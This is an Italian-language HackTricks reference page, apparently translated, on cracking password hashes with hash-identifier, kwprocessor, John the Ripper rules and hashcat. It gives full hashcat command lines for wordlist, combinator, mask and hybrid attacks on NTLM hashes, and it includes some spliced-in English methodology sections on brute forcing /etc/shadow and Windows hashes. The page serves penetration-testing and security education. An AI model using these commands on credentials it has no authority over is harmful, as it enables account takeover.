Usa Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della community più avanzati al mondo.
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Strumenti

Esempi di hash: https://openwall.info/wiki/john/sample-hashes

Identificatore di hash

hash-identifier
> <HASH>

Liste di parole

Strumenti di generazione di liste di parole

  • kwprocessor: Generatore avanzato di sequenze di tasti con caratteri di base configurabili, mappatura dei tasti e percorsi.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutazione di John

Leggi /etc/john/john.conf e configurarlo

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Attacchi Hashcat

  • Attacco con lista di parole (-a 0) con regole

Hashcat già include una cartella contenente regole ma puoi trovare altre regole interessanti qui.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Attacco di combinazione di elenchi di parole

È possibile combinare 2 elenchi di parole in 1 con hashcat.
Se l'elenco 1 contenesse la parola "ciao" e il secondo contenesse 2 righe con le parole "mondo" e "terra". Le parole ciaomondo e ciaoterra verranno generate.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Attacco a maschera (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Attacco Wordlist + Maschera (-a 6) / Maschera + Wordlist (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modalità di Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Forcing

Introduction

Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the /etc/shadow file, brute forcing involves generating potential passwords and hashing them using the same algorithm and salt as the target hash.

Tools

There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools support different algorithms and techniques to crack passwords efficiently.

Methodology

  1. Obtain the Hash: First, you need to obtain the hash of the password you want to crack from the /etc/shadow file on a Linux system.

  2. Select a Tool: Choose a suitable password cracking tool based on the hash algorithm used in the target hash.

  3. Generate Password List: Create a list of potential passwords to be used for brute forcing. This list can be generated based on common passwords, dictionaries, or custom wordlists.

  4. Start Brute Forcing: Use the selected tool to start the brute forcing process by feeding it the hash to be cracked and the password list.

  5. Wait for Results: Depending on the complexity of the password and the computational power available, the brute forcing process may take some time to find the correct password.

  6. Verify the Password: Once the tool finds a matching password, verify it by logging in to the target system using the cracked password.

Conclusion

Brute forcing is a powerful technique for cracking passwords, but it can be resource-intensive and time-consuming, especially for complex passwords. It is essential to use strong and unique passwords to protect sensitive information from unauthorized access.

500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute Forcing Windows Hashes

Introduction

When it comes to cracking Windows hashes, one of the most common methods is brute forcing. This technique involves trying all possible combinations of characters until the correct password is found.

Tools

There are several tools available for brute forcing Windows hashes, such as John the Ripper and Hashcat. These tools are capable of running through large wordlists and character sets to crack the hashes.

Methodology

  1. Obtain the Windows hash that you want to crack.
  2. Choose a tool such as John the Ripper or Hashcat.
  3. Provide the tool with the hash and specify the character set and wordlist to use.
  4. Start the brute force attack and wait for the tool to find the correct password.

Considerations

  • Brute forcing can be a time-consuming process, especially for complex passwords.
  • It is important to use a good wordlist and character set to increase the chances of success.
  • Brute forcing should be used as a last resort when other methods have failed.

By following these steps and using the right tools, you can effectively crack Windows hashes using brute force techniques.

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute Force

Introduction

Brute force attacks are a common way to crack passwords by systematically trying all possible combinations of characters until the correct one is found. This technique can also be used to crack common application hashes.

Methodology

  1. Identify Hash Algorithm: Determine the hash algorithm used by the application to generate the hashes.

  2. Generate Wordlist: Create a wordlist containing commonly used passwords, dictionary words, and variations.

  3. Brute Force Attack: Use a tool like Hashcat or John the Ripper to systematically generate hashes from the wordlist and compare them to the target hash.

  4. Optimize: Adjust the brute force attack parameters such as character set, length, and rules to increase efficiency.

  5. Crack the Hash: Once a matching hash is found, the corresponding password is cracked.

Resources

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Impara l'hacking AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:


Utilizza Trickest per costruire facilmente e automatizzare flussi di lavoro supportati dagli strumenti comunitari più avanzati al mondo.
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}